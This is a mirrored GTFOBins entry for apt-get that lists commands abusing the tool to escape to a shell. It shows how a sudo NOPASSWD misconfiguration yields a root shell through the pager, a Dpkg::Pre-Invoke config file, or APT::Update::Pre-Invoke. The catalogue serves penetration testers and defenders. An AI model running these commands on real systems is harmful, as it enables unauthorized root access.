mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-27 07:18:48 +01:00
21f760676c
Thanks to https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/ Also related to #38.
21 lines
790 B
Markdown
21 lines
790 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
code: |
|
|
apt-get changelog apt
|
|
!/bin/sh
|
|
sudo:
|
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
code: |
|
|
sudo apt-get changelog apt
|
|
!/bin/sh
|
|
- description: For this to work the target package (e.g., `sl`) must not be installed.
|
|
code: |
|
|
TF=$(mktemp)
|
|
echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF
|
|
sudo apt-get install -c $TF sl
|
|
- description: When the shell exits the `update` command is actually executed.
|
|
code: sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
|
|
---
|